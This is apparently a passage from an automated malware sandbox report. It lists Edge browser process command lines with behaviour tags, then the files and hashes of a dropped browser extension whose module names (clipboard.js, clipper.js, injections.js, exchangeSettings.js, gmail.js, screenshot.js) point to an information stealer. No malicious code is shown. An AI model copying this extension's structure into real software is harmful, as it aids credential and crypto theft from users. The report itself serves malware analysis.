"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5648,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=3776 /prefetch:8
6⤵
PID:4708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5632,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=3884 /prefetch:8
6⤵
PID:4788

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5972,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=6020 /prefetch:8
6⤵
PID:2224

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5972,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=6020 /prefetch:8
6⤵
PID:1432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6100,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=6124 /prefetch:8
6⤵
PID:3808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6120,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=6376 /prefetch:8
6⤵
PID:3096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,9696096194933798390,5465176353556289115,262144 --variations-seed-version --mojo-platform-channel-handle=6396 /prefetch:8
6⤵
PID:884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
6⤵
- Enumerates connected drives
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffef875ceb8,0x7ffef875cec4,0x7ffef875ced0
7⤵
PID:3600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2152,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:2
7⤵
PID:4948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=2964 /prefetch:3
7⤵
PID:3096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2136,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=3048 /prefetch:8
7⤵
PID:2452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3292,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=3332 /prefetch:2
7⤵
PID:4824

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:8
7⤵
PID:392

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:8
7⤵
PID:1948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3984,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=3960 /prefetch:8
7⤵
PID:1432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5176,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=5184 /prefetch:1
7⤵
PID:648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5152,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=5136 /prefetch:8
7⤵
PID:1004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5156,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:8
7⤵
PID:1768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5740,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:1
7⤵
PID:2472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5660,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=5788 /prefetch:1
7⤵
PID:4816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5924,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:1
7⤵
PID:2532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5312,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=120 /prefetch:8
7⤵
PID:2156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4420,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=4972 /prefetch:8
7⤵
PID:1008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5276,i,10060066440803086792,7506220957137651695,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8
7⤵
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 696
4⤵
- Program crash
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 1788
4⤵
- Program crash
PID:924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 1860
4⤵
- Program crash
PID:4576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4460,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:8
1⤵
PID:2296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4996 -ip 4996
1⤵
PID:2364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4996 -ip 4996
1⤵
PID:1896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4996 -ip 4996
1⤵
PID:2552

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe"
1⤵
PID:692

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe"
1⤵
PID:3440

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57db4f.rbs
Filesize
25KB

MD5
4bbf23d8119111f266ae9e20af63c654

SHA1
ade429d0f077b6700eb052191c6823b8e6598ae8

SHA256
c22cfc1a87da0acc782b84416987b8869398deb16eb2dc3515805b67a28083dd

SHA512
0cc30361903e0dd99be337b9c93ad2bf0bdb7cbe54117d0e9e102ed27b7adf51dc282c058793127f2b99760093b9fe0e09e8c983ea7b19b5e4bb2f7ff873b9c7

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\config.js
Filesize
201B

MD5
324afb7ec8d2d90d3c0f3a3ce4d868b9

SHA1
025ca5a8aa7447c3c296916d2236b151f97c6bc0

SHA256
3ba0fc8d66daedf83608cd0f36f4d2df531c4fce3e4e33d5dea4251c9495b88a

SHA512
b2e3f5736bcbd8560212d692301134574ea16da80f0ea5e49b4be206ac59d01e243a948fd922e5bba75e8c667ba662feebba662d617b3b7f339f655d5b7a235d

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\ico.png
Filesize
3KB

MD5
40de419c81de274c26c63e0f23d91a3f

SHA1
3fda2c10bf0d84aa327e107730b3596fcd13d4fd

SHA256
7d1878c4a74f2b7c6deb2efb39aa4c1cef86b8792efd2022644437cad6c48af3

SHA512
a6c0a9328941b31ab92d7de6bfedb7012a66e10f1726a3648d8314a49fd37dfbed06c199db04ddf6a0da6f9d42d9a78378ea67e7399fd847d48e4427bbb0ff99

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\manifest.json
Filesize
1KB

MD5
8ba2d2d1e6fd89f3043eec0dad4216ab

SHA1
c2febbb67dabee77db24ec31104b6a68c7533379

SHA256
d0712e7acca041bc67feac1ad82d95c9e270a6beca243875e6acb27a0ead3b97

SHA512
6ffe8803afd178e56a66fe2ba1e267b71a3d4b52b47662d97dc8c5472a545aaa62502b303954c7b59bc648b214583a26fd5304cbdd4d033956953e92081bd29a

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\rules.json
Filesize
620B

MD5
6c96a8e0dc7f99afebd022054a96bff5

SHA1
836c9f51bbbc8e5dc096cee29d7354b3a2211de1

SHA256
464f3f4c07331ae1f15fe0e6a209b4cfaf8cfce14a7c79eb192cbf2c49bbcb19

SHA512
ebad39459aead9cac1d3d1bd27459de20f107a19c3492678b869d8488e014fb2fba168c7a0d98cfb7742a4052e20ba526bef29aa63cf79f923dbdb926c87469d

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\background.js
Filesize
20KB

MD5
6584c1919cfedf47cde58eebbca2ec58

SHA1
1888e3e4227ccd3bb3cd85e932fa08f43576a245

SHA256
ab5d07f3a513650aaba1b471d68e060a4336dad47ce40b8b285cfe86d2c818c4

SHA512
f48ea5a4947f806c9b213a97e8a273faa7f6ee29c1e8464aea30fc37f2a44b3547aa95fcfaad025aa7b38d9581b58330510dc87bd0dc95eeec43c2151e34861c

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\content\clipboard.js
Filesize
15KB

MD5
bdf60c34cb1b038273eda1676841cc38

SHA1
227865ea805c2105f8db3c2cac5a6ad6b177c036

SHA256
0988328127ecadb27c64d6df9af2f3c4b3fb6ac9ff80f5ffab1d95f004f0c6a1

SHA512
610e2e0295f39291f3cd7d992f26bb5ef9253cfd2ada906e86819d73bf52e98eed8c5456dff9276085b134e1ad8d87b1c7afef55b8d5f42beffc3e8ae9b637cd

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\content\main.js
Filesize
264KB

MD5
ea6e82a9d53f957f3dbeaf69e8701ccb

SHA1
ea35af512feb5cc1ea4977d6604ab86502b0332c

SHA256
f64c86921e808fcf752f6f3c52c4ab57b78dc5bde4793a04cd158ee4c1f10300

SHA512
43a559a816b3343154d0e3db934c47617703553a07ddf35366cd1955f1e5a46bc8c7454309df2a117dfcffe13f3e88eb78247a904fad8d7aec05a1a3c59d50ec

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\finder\extract.js
Filesize
22KB

MD5
4fb8f06abb3d63722d3e9149b345e7b1

SHA1
5747607708403a9bed778e48601973a6f84dad72

SHA256
d571fe72488fa93e7003162351f9b900fd3d81b7d7e76ef0fcdc31247eababe0

SHA512
96f5464908e2d9bf8049762f4579d76dd9cb0fec8fda132d1fa8c8977e87de415d2966066893cdc602d4dd5407fe2a123be08a3dcb665c49402e29a52950c1d2

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\finder\helpers.js
Filesize
25KB

MD5
544fed32ad542e4a9026d4b58c85aea3

SHA1
ebaa40c50e603934534eabe35b1caa8850472936

SHA256
8a8cea8fcb0921e899b04237cafed1985e11cc2e30c793924239ac4465077456

SHA512
335b5bc3d926b80a14a84c1d19bf4a98c7419e2df8b4c926fa6d8e00a9f38cb721a43facb7a364d498b424f55cdfc7af00c913ecd2125fe477ad2f94083f06e3

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\finder\initializeFinder.js
Filesize
9KB

MD5
8e53facb830234ab2ece220e549e9d27

SHA1
5801b2273ab027cf4ed58beaf4756734fc3bc357

SHA256
c0f7bd1865aa0fb5ff7d1a8744ac1f4c71343de5fe0f1ecbfcad8b9f41ebd009

SHA512
2d63f6300edb1af023edbf0858ae70f6e4f7b9158a7eef45cf383310a5020d3c9dab0816f410915f7046ea6fdeffd32737d7887cc6d159eaafe6d1234e28d911

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\finder\instructions.js
Filesize
9KB

MD5
b54f1206c39ede5cd0dc01b5d8884a7a

SHA1
01b5759bdf1d4c3406faa2a772cace4d776282d7

SHA256
ef43c7d52ddd864494cb30f4e905a57be9e82765b9a04cd9fd48433a0f01c757

SHA512
d6a774b1dc74febce63fa5ffe8221b84855140a8b858f98655b24338000f7205e0ccb9a45e62bc2336477c8fcc3634b8e059b18c960971d161b31459a2679c4d

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\finder\matches.js
Filesize
11KB

MD5
3269006329bde4f0859512ddaa36dc81

SHA1
25f2a3f514116dfc3f99323a586a3a7a85fa0d3b

SHA256
72197e190b67cb10ff9945802027343598c9c4b743e31e7e905d9db5f42218cc

SHA512
446bbe4c5b6071040d17babd2a69604f4dc0e0cee5cf1c6b2049222da13d254cd01d9662998cfdc96da6f52a7150863e06f87d1eaa6fe316ddc82ef6e84aee38

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\finder\organizeFoundFiles.js
Filesize
10KB

MD5
532b4933f58414919f5f47424e2d4aaf

SHA1
c79bf61f2214e54d42220ebd4a0946b929a1214e

SHA256
3280beb0dde5c5b3bbd74bc1d1c0f2b8a0149088bb4c50c4b4e162aa64a094af

SHA512
4d7ea63a15c5cd479ac2a3fa65efc4603ccaa06abd76e94d6fa23e8d660c0c2546731d24d641269bf8dd09f9344575fba7a59ce687ee45b4187624fc2d2507d2

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\finder\traverse.js
Filesize
8KB

MD5
e35450129e3146af727a02cb67e73736

SHA1
80efcddca3733abc8daad07eda30ca5bf5e174ef

SHA256
f85f33f30423222e2f0ada730310c4c29d54e0b408bfec48bd0815ab964e9e80

SHA512
dfc86804eeccdef09519334850bd9418cb0e5e25ad5be4126ababd2650d38022bc57c44059ee25d066fc356e5745e4d11dcac26ab3eefdea6580936a31b605b6

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\finder\zip.js
Filesize
9KB

MD5
24470b47bb38d00dfb7f43ad232f5e19

SHA1
c6ee83c14f8741b36b1cb032ba2a4839ea2efd1f

SHA256
7d653e54b2bf0cda37a72840ec46a9b7abce48f5ee61ba5e270dbde28e9316e9

SHA512
651170b8000c319cbaff372a8f6d29bdcd46c638b8766d069ad8245830e4981993838cc0eeeb7f78aa8f1fb2408025583d9714c329fd6ae89cfbe761623864c1

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\finder\ziplib.js
Filesize
93KB

MD5
155d498ff2da255a9bae71b447c6288c

SHA1
c03cc16f01c8b35dcb9a9663cdd9b20002c2ee7a

SHA256
c6fda8ece85c00abf4ea422ab505d2991572b1f91c918daad7f8c9c60eb26e53

SHA512
238df0249bbcdfde4e4aaed8e235e2b36ec286e9e1cba15479c6e24f53127bc77fca600298fdb937fa4c06f7f439f45b822878571e296777132c777525fd5087

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\clipper.js
Filesize
7KB

MD5
b472b3a03f40b4867b894dc0375b5620

SHA1
c3e0cea36a96ada923874375c281a08fc3e78d69

SHA256
edcba36dc89901abc57d041d9ed1ff5bebc99243d2513decbacaf2522e77707f

SHA512
c504f045727bc07b115a62cab1be1bec02a55f0a5ee155b7f9cc2151f63723dd769290375165d09079f9c4862fe7d41162c55b38b645510956fa2af0cbb0fe96

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\commands.js
Filesize
18KB

MD5
84b871a68d4aea90006f51d165627d0b

SHA1
a8b84c11222d7fb9cf631eab0da03d662cf01fba

SHA256
b01c20d2fb95386cc70a4080854a05cf452203c5bb8e2d9b021109c7cf037c56

SHA512
6a834f42c15c48c229dddf76fb4279326609064ba4de4f410fa12ce62d5552990f675a120c74deddcf5c8418fc5d68b52ae8286798351da24c6802275b611f95

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\csp.js
Filesize
6KB

MD5
51aeca79c095a00e96ea2a5f982f0bf3

SHA1
cd1ef0f2c4578c677d0113e62e7f03d0d4e5fc9c

SHA256
a6c7232ceff9a6182455d6c12aa24261c230061ef44429bbc7c230d217ca3d1e

SHA512
89a34fec6add8d6f3b732106e9710a5e7660d22f1d464bf4afaabc31939bc2e7d94974604937c59ef7690e40d6e17868016c63417894372b90f23cc21082bbee

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\domain.js
Filesize
81KB

MD5
42543ee0615ac8e7d8dd283450627a9a

SHA1
1c59e8cc5168d09280a30aba96e7be87330707bf

SHA256
6461c98798a942e66c929b0744e98d31b87ae4fab9e1ee9c8d471102c67eff64

SHA512
5f0f0ff1976a533ba783ebc5e4460c227ffd387dd96ed43f31d66f7fc982b76290e00d5898de02b5e0b890132e1f173df896826f4eb53fed9920d4460e92388d

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\exchangeSettings.js
Filesize
70KB

MD5
6412dfa7424de5278563ea9a4fff0899

SHA1
e5682fe970ac60f07ac1d00125294cb644671f64

SHA256
2dafcc5a976a1cff0d5af2be685c328046864679329e76a31b6e3c00bdda8c5b

SHA512
f1d0f3c1ee434712ad7d08305f4d90b28a1d2a9a0fd623dafb91b2a4756ab7339b5bab3624dc9d923a09ad9df764de7e1ed82a09ed83018ae01eae5bbc1eb2b7

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\extensions.js
Filesize
7KB

MD5
5a6ff39136908b30807f0f655b821774

SHA1
20a4ffa6ec365700fbfcccb17303c7fef937eb28

SHA256
8382e430a62a9b9ad36a2eadc2464a702d8463d358aeb5bd2d791a40e54a6cca

SHA512
c26165449fefb1599b3f048202f189aea6ae3400f07464059abe1e38ec2dbc2c1e5ae024d907dacd36b403f2b369715f3aa16e72fa7e8149b7551bd11e18f023

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\getMachineInfo.js
Filesize
36KB

MD5
dba44249c77320265855a2d0ff0d0e8c

SHA1
0a6311d8ee10fbb25c431110e46c8ba0f2bcc9d4

SHA256
ddcda06656697a36327022441b9d3bb0be9659d11bdc47b15f2b66bacc8467c6

SHA512
fb2d3a6082c04f1ad3a0ca04de562fe1a05f6a48d14a6bb9525f4a8a9c0a9b1ff65855c82bb13810092da1f40fc7184b6d294c1e178317e97e691091a8e3a71b

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\injections.js
Filesize
19KB

MD5
d47b42278267e03e751a8003085edfab

SHA1
b0e505b7f98b1eaa296f39b9c4fb354e3dc6ccda

SHA256
d3dc4409668286c7b346a3ef0e1f44917c0cb17b0e8006aeab61d4e3523dc905

SHA512
7b1dae7273e3edec62e738627d527fcc084a31d2d50f1b6201bf2c8e766b67fb9c88423864236aecf3ce35f074bc453138b819c29ee2bdb38b441496cdee7413

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\notifications.js
Filesize
8KB

MD5
f2b411ad96925e7ac62a37a5b93b3d3c

SHA1
c91c6cbe3872bf25b32f4d92f4718857023c25bc

SHA256
ab298dff735dd87d2a2b2c6169f75bd7696511bbd901a473a48b3e0795292fe5

SHA512
83ae660eb6fba8e1db6daba34ee6048ca0dfde97b508e073608a698f1f5cfabffc8d6b0d0903a034d4af031e176fb9d54094f119f0efc3deb53ec61b385a57c2

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\proxy.js
Filesize
98KB

MD5
edf06cb5b8061f38c054f49a0ef0f32b

SHA1
5ca1c747ef32f749140f317feff7f6221edc9083

SHA256
0712393dea00331be52e6eed30261e284b9ccd7386358e296f70dec4a1f9b8c9

SHA512
c8b63ba9a48a4cbb28a6da7e66ef9d0f389820083ac6ad5cd4172d4324ac9c134686115c938909f58fff2af0d0fa2f49ddfeb5f2648836d4ad0101f1efe13e01

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\screenshot.js
Filesize
6KB

MD5
b376e7c3b8a9185bb5d81f9254cd16a9

SHA1
20033c7d673f90eec694d8b5612427d74ce41164

SHA256
e30c58718f1a1229ef3627678c408afed8260de1845875c399c39fe149c62dce

SHA512
1274832f2a45a8e53bea83f21dfed16c719ca61cb3fd951b36bb138fbc6975fb739ed214f4a61a941d9b21e59e14f5a90d4e8ee8b6c13549135c24ac69abcbd4

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\screenshotRules.js
Filesize
8KB

MD5
46ab6fc9c81de222b3edfb775247e5b2

SHA1
2f1944f0485983b54296627b19b8ba7dbe20b592

SHA256
f6e3f5dd727f7ac75d6fcc759b92ec4c79d6078df21c8af28fcb281d983bdc92

SHA512
023a109debfdfa5cd54a15d5f0a4ced0f28631009603c561e6788b2c764b5822ad8a4c5c0591b72261b6101632a2745163ae5e7892263d93f99916899a78c3ae

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\settings.js
Filesize
7KB

MD5
fea3bfcc60a6158d8757d8ffcc3a469a

SHA1
f0661b6c090e75dd03f89b220ecef683a9d6b64b

SHA256
a2f6f1149b99be59662d354e946a043e35311b45fa66c40b64e971daabf98f58

SHA512
e9b72b81b473a1ed8887d92049de9746a52b00d7cd18ef5964523535c678b4286607c1fbfe93507ec0bb3e225511e26c02819542b5df8969c6ea4229bec255a9

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\tabs.js
Filesize
8KB

MD5
ac66d7c25f99997add2b2da402149315

SHA1
ddd3d2d490779e9462f05f6ed6e968f44733ea8d

SHA256
46ee0a6ce54cdce28e8a1c19c519a35c8bd2e3e8c2ba04001fe7e2d2cf47978b

SHA512
2ff969eecf2c0ac95a81f61e1cebefbb34fff534e1f654930a3be22a15e1c0c036d8f93947d77691bbbfddc8d8a6ad5663ececce24ec733e2b2a4a4c401f2d7e

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\functions\utils.js
Filesize
5KB

MD5
958bbe10ebe489ed5b5f36a60293e9df

SHA1
67286b73c98355d7f2b937d329a53b6c7420c235

SHA256
68c594284d818f37112477bfe1a1ae9acc42491cdb76f399e1f9807269113e91

SHA512
a417c20ec927323e93e915101a9c63f0e7485a55a6989c05b5202dbfe1aeca4b78e681a501191e62ffdd2a8da34e922beacb40013a98dfecd6317d687f5145c3

Download Submit
C:\Users\Admin\AppData\Local\KMYuwHGnxJiC\src\mails\gmail.js
Filesize
314KB

MD5
c74d352ebf4b396cbe1cf3fbc2eb38bc

SHA1
5403472837fdf5e29a2b6545cd122b1e92703241

SHA256
7c641c48d4605f0fe3e681caaf6e7672134cda59fbf728e3bc15b97ff7fba214

SHA512
ba0f874119860a653601f1eb696a6c3d7e08b6693682b5cbc4a4ab73b67881311aa9f347a51cb709cc8216292d50d7329913d427239f21a12584c174a93db2d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
280B

MD5
fbafe3742259974b8f1d3ddd33c30f14

SHA1
5db26c75764f137eca3e62eb53d2780050a623ee

SHA256
